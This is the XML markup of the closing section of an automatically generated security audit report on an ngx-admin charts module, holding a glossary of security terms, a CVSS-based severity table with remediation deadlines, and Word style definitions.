              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Content Security Policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">An HTTP response header that instructs browsers to restrict which resources (scripts, styles, frames) a page may load, mitigating XSS and clickjacking.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cross-Site Request Forgery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">An attack that tricks a user's browser into making an authenticated request to a web application without the user's knowledge.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Common Vulnerabilities and Exposures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A publicly disclosed list of known cybersecurity vulnerabilities, each assigned a unique identifier.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Common Vulnerability Scoring System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A standardized framework for rating the severity of security vulnerabilities on a 0–10 scale.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">DAST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dynamic Application Security Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Security testing performed against a running application, simulating real attacks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">DOM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Document Object Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The browser's in-memory representation of an HTML document, which JavaScript (including D3.js) can manipulate.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">IDOR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Insecure Direct Object Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A type of broken access control where an application exposes internal implementation objects (e.g., database IDs) directly to users without authorization checks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">NVD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">National Vulnerability Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">NIST's repository of CVE vulnerability data, including CVSS scores and remediation guidance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">PII</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Personally Identifiable Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Any data that could be used to identify a specific individual, such as name, email address, or government ID number.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">SAST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Static Application Security Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Security analysis performed on source code or compiled binaries without executing the application.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">SCA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Software Composition Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Automated analysis of third-party and open-source components to identify known vulnerabilities, license risks, and outdated versions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">SSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Server-Side Request Forgery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">An attack where an attacker causes the server to make HTTP requests to unintended destinations, potentially accessing internal services.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">SVG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Scalable Vector Graphics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">An XML-based vector image format used by D3.js for rendering charts and visualizations in the browser DOM.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cross-Site Scripting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">An injection attack where malicious scripts are injected into web pages viewed by other users, enabling session hijacking, credential theft, and other attacks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="45"/>
    <w:bookmarkStart w:id="46" w:name="severity-levels"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Severity Levels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Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CVSS Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Meaning in This Report</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">9.0–10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Immediately exploitable; direct path to unauthorized access, data breach, or system compromise. Fix within 24 hours.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">7.0–8.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Significant vulnerability with high probability of exploitation and serious impact. Fix within 1 week.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">4.0–6.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Moderate vulnerability requiring specific conditions or attacker access to exploit. Fix within 30 days.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0.1–3.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Minor weakness with limited exploitability or impact; defense-in-depth improvement. Fix within 90 days.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Security best practice recommendation or hardening suggestion with no direct exploitability. Consider for future work.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">End of Security Audit Report — ngx-admin Charts Module — April 2026</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Generated by DocAgent — automated codebase documentation analysis. Subject matter expert review is recommended before distribution.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="46"/>
    <w:bookmarkEnd w:id="47"/>
    <w:bookmarkEnd w:id="48"/>
    <w:sectPr>
      <w:headerReference r:id="rId9" w:type="default"/>
      <w:footerReference r:id="rId10" w:type="default"/>
      <w:pgSz w:h="15840" w:orient="portrait" w:w="12240"/>
      <w:pgMar w:bottom="1080" w:footer="708" w:gutter="0" w:header="708" w:left="1080" w:right="1080" w:top="1080"/>
      <w:pgNumType/>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7E5E4" w:sz="4" w:space="4"/>
      </w:pBdr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="A8A29E"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="A8A29E"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
      <w:instrText xml:space="preserve">PAGE</w:instrText>
      <w:fldChar w:fldCharType="separate"/>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="A8A29E"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="A8A29E"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
      <w:instrText xml:space="preserve">NUMPAGES</w:instrText>
      <w:fldChar w:fldCharType="separate"/>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7E5E4" w:sz="4" w:space="4"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="A8A29E"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">DocAgent Deliverable</w:t>
    </w:r>
    <w:r>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:i/>
        <w:iCs/>
        <w:color w:val="A8A29E"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Confidential</w:t>
    </w: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1">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w15:tentative="1" w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="720"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w15:tentative="1" w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="1440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w15:tentative="1" w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="2160"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w15:tentative="1" w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="2880"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w15:tentative="1" w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="3600"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w15:tentative="1" w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="4320"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w15:tentative="1" w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="5040"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w15:tentative="1" w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="5760"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w15:tentative="1" w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="360" w:left="6480"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w15:restartNumberingAfterBreak="0" w:abstractNumId="2">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w15:tentative="1" w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w15:tentative="1" w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="◦"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w15:tentative="1" w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w15:restartNumberingAfterBreak="0" w:abstractNumId="3">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w15:tentative="1" w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w15:tentative="1" w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w15:tentative="1" w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>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displayBackgroundShape/>
  <w:embedSystemFonts/>
  <w:proofState w:grammar="clean" w:spelling="clean"/>
  <w:stylePaneFormatFilter w:val="0004"/>
  <w:doNotTrackMoves/>
  <w:defaultTabStop w:val="720"/>
  <w:evenAndOddHeaders w:val="false"/>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C1917"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
    </w:rPrDefault>
    <w:pPrDefault>
      <w:pPr>
        <w:spacing w:after="160" w:line="324"/>
      </w:pPr>
    </w:pPrDefault>
  </w:docDefaults>
  <w:style w:styleId="Title" w:type="paragraph">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="72" w:before="1440"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1C1917"/>
      <w:sz w:val="72"/>
      <w:szCs w:val="72"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Heading1" w:type="paragraph">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:pageBreakBefore/>
      <w:pBdr>
        <w:bottom w:color="8B1A2B" w:space="6" w:sz="18" w:val="single"/>
      </w:pBdr>
      <w:spacing w:after="144" w:before="360" w:line="288"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="8B1A2B"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Heading2" w:type="paragraph">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:pBdr>
        <w:bottom w:color="E7E5E4" w:space="4" w:sz="6" w:val="single"/>
      </w:pBdr>
      <w:spacing w:after="96" w:before="384" w:line="288"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1C1917"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Heading3" w:type="paragraph">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:after="72" w:before="312" w:line="288"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1C1917"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Heading4" w:type="paragraph">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:after="60" w:before="264"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:color w:val="57534E"/>
      <w:sz w:val="23"/>
      <w:szCs w:val="23"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Heading5" w:type="paragraph">
    <w:name w:val="Heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="2E74B5"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Heading6" w:type="paragraph">
    <w:name w:val="Heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="1F4D78"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Strong" w:type="paragraph">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="ListParagraph" w:type="paragraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rPr>
